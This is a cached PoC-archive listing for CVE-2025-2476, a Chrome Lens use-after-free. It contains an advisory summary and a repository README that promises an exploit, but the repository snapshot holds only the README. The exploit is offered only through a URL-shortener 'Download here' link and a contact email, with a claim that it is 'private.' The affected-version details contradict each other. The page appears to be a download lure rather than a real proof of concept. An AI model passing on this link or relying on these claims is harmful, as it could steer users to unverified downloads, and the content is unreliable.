CVE-2025-2476 PoC — Google Chrome 资源管理错误漏洞

Source

https://github.com/McTavishSue/CVE-2025-2476

Associated Vulnerability

Title:Google Chrome 资源管理错误漏洞 (CVE-2025-2476)
Description:Google Chrome是美国谷歌（Google）公司的一款Web浏览器。 Google Chrome 134.0.6998.117之前版本存在资源管理错误漏洞，该漏洞源于Lens组件中的释放后重用问题，可能导致远程攻击者通过特制HTML页面利用堆损坏。

Description

Use After Free (CWE-416)

Readme

# CVE-2025-2476 Use After Free (CWE-416)
## Overview
A use-after-free vulnerability in the Lens feature of Google Chrome that could allow a remote attacker to exploit heap corruption through a crafted HTML page. The vulnerability affects Chrome versions prior to 134.0.6998.117.
### Exploit:
### [Download here](https://tinyurl.com/bdzsueen)
### Details
+ **CVE ID**: CVE-2025-2476

+ **Published**: 03/19/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 8.8
## Impact
An attacker could potentially: - Execute arbitrary code on the target system - Cause heap corruption - Compromise the confidentiality, integrity, and availability of the affected Chrome browser The vulnerability can be triggered by a user visiting a maliciously crafted HTML page, making it a significant risk for widespread exploitation
### Affected Versions
Google Chrome version 134.0.6998.117
### Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/bdzsueen)

File Snapshot


 [4.0K]  /data/pocs/778758f53288e285bb8698a72f7208d5c342c98e
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!